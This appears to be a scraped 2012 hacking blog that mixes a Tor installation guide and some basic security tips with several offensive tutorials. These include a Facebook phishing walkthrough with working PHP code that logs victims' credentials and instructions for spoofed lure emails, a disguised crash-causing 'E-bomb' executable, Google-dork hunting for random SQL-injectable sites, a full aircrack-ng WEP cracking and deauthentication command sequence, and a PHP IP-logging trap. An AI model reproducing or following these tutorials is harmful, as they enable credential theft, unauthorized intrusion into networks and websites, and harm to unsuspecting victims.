The Tor software protects you by bouncing your communications around a distributed network of relays run by volunteers all around the world: it prevents somebody watching your Internet connection from learning what sites you visit, it prevents the sites you visit from learning your physical location, and it lets you access sites which are blocked.

The Tor Browser Bundle lets you use Tor on Windows, Mac OS X, or Linux without needing to install any software. It can run off a USB flash drive, comes with a pre-configured web browser called Aurora, and is self-contained. If you would prefer to use your existing web browser, install Tor permanently, or if you don't use Windows, see the other ways to download Tor.

Download TOR:-
For Windows

For MaC

For Linux

Installing TOR on Windows

Download the file above, and save it somewhere, then double click on it. Click on the button labelled "..." (1) and select where you want to save the bundle then click OK (2). At least 50 MB free space must be available in the location you select. If you want to leave the bundle on the computer, saving it to the Desktop is a good choice. If you want to move it to a different computer or limit the traces you leave behind, save it to a USB disk.

Click Extract (3) to begin extraction. This may take a few minutes to complete.

Once extraction is complete, open the folder Tor Browser from the location you saved the bundle.

Double click on the Start Tor Browser (4) application (it may be called Start Tor Browser.exe on some systems.)

The Vidalia window will shortly appear.

Once Tor is ready, Firefox will automatically be opened. Only web pages visited through the included Firefox browser will be sent via Tor. Other web browsers such as Internet Explorer are not affected. Make sure that it says "Tor Enabled" (5) in the bottom right corner before using it. To reduce the risk of confusion, don't run Firefox while using the Tor Browser Bundle, and close existing Firefox windows before starting.

If you installed the Tor IM Browser Bundle, the Pidgin instant messaging client will also be automatically opened.

Once you are finished browsing, close any open Firefox windows by clicking on the (6). For privacy reasons, the list of webpages you visited and any cookies will be deleted.

With the Tor Browser Bundle, Vidalia and Tor will automatically close.

Source: www.torproject.org

How To Hack Facebook Accounts with Phishing [Step by Step]

2012-03-13T19:00:00.000+05:30

Now im gonna make a step by step tutorial for facebook accounts..

ONE!:

go to "www.facebook.com/login.php" and right click on some white space
on the page and press "view source code". A LOT of text is gonna appear,
copy it all to notepad.

TWO!:

Now we need to change a few things in the code. So that the login button
sends the info to our file instead of the facebook login. We do that by
editing the action of the code. So press Edit >> search. and
search "action=" without the quotes. you should find this

The big red ring that circles the "action=" you have to change. You have

to change it to 'action="next.php" '. after you have done that, you

should change the method (small red circle on the picture) to "get"

instead of "post", or else it will not work. Save the document as

"index.PHP" (not htm!)

THREE!:

Now that we changed the action to next.php, we should also make a "next.php". open up notepad again. And write this:

<?php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

Save this as "next.php"

Note: for security you should rename "passwords.txt" to something else.

now make a text file called "passwords.txt" or whatever you renamed the file to in the "next.php", leave this document blank.

FOUR!:

Upload the 3 files "index.php", "next.php" and "passwords.txt" (or

whatever the password file is called) to a subdomain hosting site. THEY

MUST SUPPORT .PHP! i suggest these: 110mb.com, spam.com or 007sites.com.

When you made an account you should upload the 3 files.

Congratz. You have yourself a working Phisher site!

FIVE!:

now we would like to send spoof emails out. To do that we should first

make an email account. which starts with facebook@. or something that

looks alike. like this FACEB0OK@hotmail.com or something like that. You should either use Gmail, Live, or hotmail. or you could get a mail like this "facebook@noreply.com" soemthing like that. but eventually that would cost. When your email is set go to step six.

SIX!:

Copy the content of an original Facebook friendship invitation email and paste it into a new mail. DONT SENT YET!

remove the hyperlink from this link:

http:/www.facebook.com/n/?reqs.php

Mark it and push the Add hyperlink button

Add hyperlink button in the red circle. now write your phisher page url

in the hyperlink bar that appears after clicking the button. and click

add. The hyperlink should still display

http:/www.facebook.com/n/?reqs.php

but lead to your phisher page.. Thats pretty kewl. Now i belive your

ready to send your spoof emails to everybody you know. and hopefully

some of them will fall for it..

Enjoy.. ;)

Collection of 25000+ SQL Injection Google Dorks

2012-03-13T15:57:00.001+05:30

The almighty Google is just a search engine for common users, but, for hackers this search engine helps them to use Google Dorks (Kinda God Gift For Newbies) :

Google dorks are the center of the Google Hacking. Many hackers use google to find vulnerable webpages and later use these vulnerabilities for hacking.

Many types of Dorks are used for this purpose-
But here I have a vast collection of more than 25000+ SQLi google dorks:-

Basic SQLi Dorks (2450+ dorks)

Modified SQLi Dorks (4350+ dorks)

Other SQLi Dorks (13000+ dorks)

New SQLi Dorks (4350+ dorks)

.

How to Crash PC using E Bomb

2012-03-13T15:57:00.000+05:30

WHAT IS AN E-BOMB ??

An E-Bomb is some kind of program that opens many windows, and crashes the target computer.

This guide can be followed by any one, but the only problem is getting the victim to open the executable file.

First of all, download this and follow the below illustrated steps :

Download QuickBFC here

HOW TO MAKE AN E-Bombs??

Instructions:

1. Open Notepad, then copy and paste the code from here

2. Save it as File Name.bat (Remember the .bat)

3. Open “QuickBFC”, the program you’ve just downloaded.Once open, click open in the program and browse for your batch file you made earlier. Now, you will make it into an executable file. but first, we need to change a settings of the program. Go to “Options” and select “Ghost Application” as the output type. If you don’t, then a command prompt window opens and gives your file away.

Enjoy!

8 Top Facebook Security Tips

2012-03-12T16:23:00.000+05:30

World wide web is now expending, Internet has successfully turn the whole world into a village and for doing this social networks played and playing an important role, in the era of social networks there is a facebook, Facebook has a large number of user's and it is on hit list of attacker's and scam-er.
While you are using facebook or any social networking website there is a need to protect your information by using effective privacy techniques.
This article will talk about some security issues and their countermeasure on facebook or it can be applicable on other social networking websites.

Strong Passwords

You must care about your passwords, make sure you have a strong password that contain capital letters,small letters,numbers and special characters. Use different password for different online accounts, your password must not related to some of your information, do not use such a words that are easily available on dictionary. To learn more about dictionary attack click here.

Secure Browsing

It is good practice to keep yourself up to date means make sure that you are using update OS and browser to avoid browser exploitation attack, use secure connection (HTTPS) where possible to avoid sniffing.

Computer Security

It is very important to stay secure on web, make sure your computer does not contain any sort of keyloggers, RAT (remote administration tool) and istealer or some other things like this. Use a smart antivirus and firewall solution to remain secure, if you think that your computer got affected by some malware and than follow the procedure to fight with.

Personal Information

Avoid to put so much information about yourself on facebook profile, a hacker might be use these information to hack your password by using reverse engineering technique, or an attacker might create a dictionary by using your information to launch a password based attack.

Profile Privacy Setting

It is recommended to make your profile as a privacy master profile, hide your information from those people to whom you never trust and from those people who are new to you, disable each and everything from those who have not added into your profile as a friend, because there is chance that someone watching your activities.

Application Setting

Each facebook application has a default setting and when you allow any application to use, it means that you have signed an agreement and the developer of this application may watch all of your activities and can get your password, can update your status and more, so avoid applications as much as possible. To learn more about application spamming click here.

Account Security

It is good practice to add different email address for your single profile and must connect your mobile phone with your profile, in case if you lost your account than you have an ability to prove as a owner of this account, lean more security to protect your account.

More Tips

You must not share your password to any one.
Disable your browser from saving your password.
Avoid to sign in your account when you are in public place.
If you are using wireless LAN(WLAN) than must think about firesheep.

What are Trojan / Worm / Virus / Logic Bomb??

2012-03-12T12:35:00.002+05:30

We generally hear some terms like Trojan / Worm / Virus / Logic Bomb,etc..
By the way what are these???
Read and know about them below:

Trojan:

Remember the Trojan Horse? Bad guys hid inside it until they could get
into the city to do their evil deed. A trojan computer program is
similar. It is a program which does an unauthorized function, hidden
inside an authorized program. It does something other than what it
claims to do, usually something malicious (although not necessarily!),
and it is intended by the author to do whatever it does. If it's not
intentional, its called a 'bug' or, in some cases, a feature Some
virus scanning programs detect some trojans. Some virus scanning
programs don't detect any trojans. No virus scanners detect all
trojans.

Virus:

A virus is an independent program which reproduces itself. It may
attach to other programs, it may create copies of itself (as in
companion viruses). It may damage or corrupt data, change data, or
degrade the performance of your system by utilizing resources such as
memory or disk space. Some virus scanners detect some viruses. No
virus scanners detect all viruses. No virus scanner can protect
against "any and all viruses, known and unknown, now and forevermore".

Worm:

Made famous by Robert Morris, Jr. , worms are programs which reproduce
by copying themselves over and over, system to system, using up
resources and sometimes slowing down the systems. They are self
contained and use the networks to spread, in much the same way viruses
use files to spread. Some people say the solution to viruses and worms
is to just not have any files or networks. They are probably correct.
We would include computers.

Logic Bomb:

Code which will trigger a particular form of 'attack' when a
designated condition is met. For instance, a logic bomb could delete
all files on Dec. 5th. Unlike a virus, a logic bomb does not make
copies of itself.

How to find a Vulnerable Website and Start Hacking ??

2012-03-12T12:09:00.000+05:30

Now a days Website Hacking has become a tradition or fun to create problems for other people. Hackers are searching for finding the holes in the websites having high page ranks and traffic.
Many newbies don't know that how to find security holes in random sites..??
Now here is an easy way to do so.. :)

Follow the following steps.

1-) First go to http://www.google.com

2-) Press on the right, next to the textfield, on "Advanced Search".

3-) Fill in your dork at "This exact wording or phrase".
Results per page: 100 results (Or less depending on your internet speed.)
Language: Could be all languages or one language. I choose Dutch
because I'm Dutch myself and I got a Dutch ISP so those sites will load
faster.
Where your keywords show up: "in the URL of the page"

4-) Press search.

5-) Now we get this:

6-) Press on about 10 links with your middle mouse (scrollbar) so each page will be opened in a new tab.

7-) Open the tabs and add as example a single quote behind the link.

8-) If it's vulnerable continue your injection else repeat step 5 -> 6.

Very easy :) Isn't it..??? :P

This was for some random sites,but for specific target sites various Web Security Scanners can be used.
One of the popular Web Security Scanner is Acunetix Web Security Scanner.

How To Crack WiFi WEP With Packet Injection

2012-03-10T15:18:00.000+05:30

Intro

By now most people have wireless networks at home. A lot of them may have experienced leechers or have leeched themselves through an open network. An easy way to prevent that from happening is to encrypt your network traffic. One of these methods is by use of WEP or Wired Equivalent Privacy. I’m going to talk about why you shouldn’t use WEP and how easy it is to crack.

Background

WEP was designed to provide similar privacy that a user would have if they were wired to their network. The way it works is it uses either a 64-bit or 128-bit encryption key and follows the RC4 symmetric encryption standard. 24 bits of the key are used for an IV which is intended to encrypt each packet with a different key. The remaining bits are for your PSK; limiting your key strength to 40 or 104 bits.

How it works

The transmitting station appends the PSK to the IV to create the seed. The seed is pushed through a PRNG to generate a stream of random data. The random data is then passed to a function to perform a binary logic XOR against the plain text to create the cipher text. The cipher text is then appended to the IV with an indicator bit stating that is is an encrypted packet and is sent through the airway. The receiving station looks for the encrypted bit and extracts the IV if found. The IV is attached to the PSK and passed through the PRNG algorithm to obtain the same stream of random data the transmitting station generated. This stream of data is then passed through the same XOR function to reverse the encryption and leave you with the plain text.

What’s the problem?

The problem is that for efficiency an IV isn’t very large. This creates a problem of running out of unique keys effectively exposing the PSK. A busy AP will run out of unique keys in a few hours and an attacker can be sitting and collecting data the whole time, or they can take a more aggressive approach and have all the information they need in a few minutes by use of packet injection.
The other downfall is that WEP only encrypts the payload and not the entire packet. This leaves the header information in plain text giving away information that can be very useful for an attacker.

How is it done?

There are tools available to crack the encryption on an IV collection. It’s as easy as sitting around listening to network traffic and then running a program once you have enough data. That’s all there is to a passive attack.
Sitting around and waiting for a network to give you enough data by itself can take hours or even days. The process can be sped up to a matter of minutes by injecting the network with fake packets. This is done by setting your wireless card to monitor mode and pretending to be an actual user of the network trying to establish a connection.
The tool I am going to use in this example is AirCrack. It is an entire suite designed for testing and breaking through protections on a wireless network. I don’t suggest attempting to use this tool in a Windows environment. The tools and driver support isn’t as readily available. I do recommend to Windows users to take a look at the Backtrack Linux live environment. It can be run off of portable media such as a DVD or flash drive.

Set your wireless card into monitor mode.

You need to have a wireless card that supports monitor mode. Monitor mode allows you to listen to all packets instead of only packets intended for you. This is done by creating a virtual interface to act as a second wireless adapter using the same hardware. The tool to automate this is airmon-ng. Please substitute your wireless interface accordingly in the following steps.

Take the interface down:

# ifconfig wlan0 down

Bring the interface back up in monitor mode:

# airmon-ng start wlan0

Test injection capabilities:

# aireplay-ng -9 -e ESSID -a 00:11:22:33:44:55 mon0

-9 tells aireplay to test injection
-e is the ESSID of the AP
-a is the BSSID (MAC Address) of the AP
mon0 is my interface in monitor mode

Start grabbing IVs:

# airodump-ng --bssid 00:11:22:33:44:55 -w ESSID mon0

–bssid is the MAC Address of the AP
-w is the prefix for the capture files, I normally use the ESSID

That’s all you need to do for a passive attack. Now we’ll speed up the process.

Authenticate with the AP:

One of these will work better than the other depending on your scenario. Choose what works best for you.

# aireplay-ngÂ -1 0 -e ESSID -a 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF mon0

# aireplay-ngÂ -1 6000 -o 1 -q 10 -e ESSID -a 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF mon0

If neither of those work MAC filtering may be configured and you will need to spoof your MAC to an existing client. Then you can either move on to the next step masquerading while the client is still up, or sent a deauthenticate packet and try the previous again / wait for the client to reauthenticate and send ARP packets.

# aireplay-ng -0 1 -a 00:11:22:33:44:55 -c AA:BB:CC:DD:EE:FF mon0

Inject your packets:

Finally, you’re associated and not getting sent deauthentication packets. As long as you are associated the AP will respond to your packets. If you lose authentication just perform what you had to do in the previous step. Now we’re going to start repeating ARP packets.

# aireplay-ng -3 -bÂ 00:11:22:33:44:55 -h AA:BB:CC:DD:EE:FF mon0

Crack your data:

Once you get about 20,000 you can try to see if you can find the key. You can perform this step while still collecting IVs. First we’ll try to crack based on a 64-bit key. Replace ESSID with whatever you put for the -w parameter for airdump previously.

# aircrack-ng -n 64 ESSID*.cap

If that doesn’t work we’ll try for a 128-bit key.

# aircrack-ng ESSID*.cap

Conclusion

The process to break through WEP can be completly automated and done in a very short period of time. Make sure you secure your network with something more secure. At the time of this article I use WPA2 with a RADIUS backend.
If you are trying this at home and can’t crack it right away don’t get discouraged. It once took me over 2 million IVs to break into my home network. It’s all a matter of luck when it comes down to aircrack-ng step.

How to get anyone's IP address

2012-03-10T14:53:00.001+05:30

Here's easy trick to find IP addresse of any one ,we can use it to find anyone's Ip easily while chatting in GTalk, Facebook, Yahoo messenger or anywhere else. You can also use it in a E-mail to find the Ip of the Recieptent.

Process:

Create a new notepad file on your desktop and name it "ip.txt"
Now save it.
Now create another text file using notepad and open it.
Copy the Below code from here and paste it there

$file = "ip.txt";$f=fopen($file, 'a');fwrite($f,$_SERVER['REMOTE_ADDR']."\n");fclose($f);?>

Now save this txt file with the name" get.php"
Now upload both the files "get.php" and "ip.txt" to any free web hosting site. eg. 110mb.com or my3gb.com
Now give the link of get.php to anyone .
He will get an error " File Not Found."
And You got the Ip address !

How to view the Stolen Ip Address..???

Just view the ip.txt file on your uploaded site and you'll get the ip adress of all the peoples who visited your link.

And we all know what can be done with just an IP Address. ;)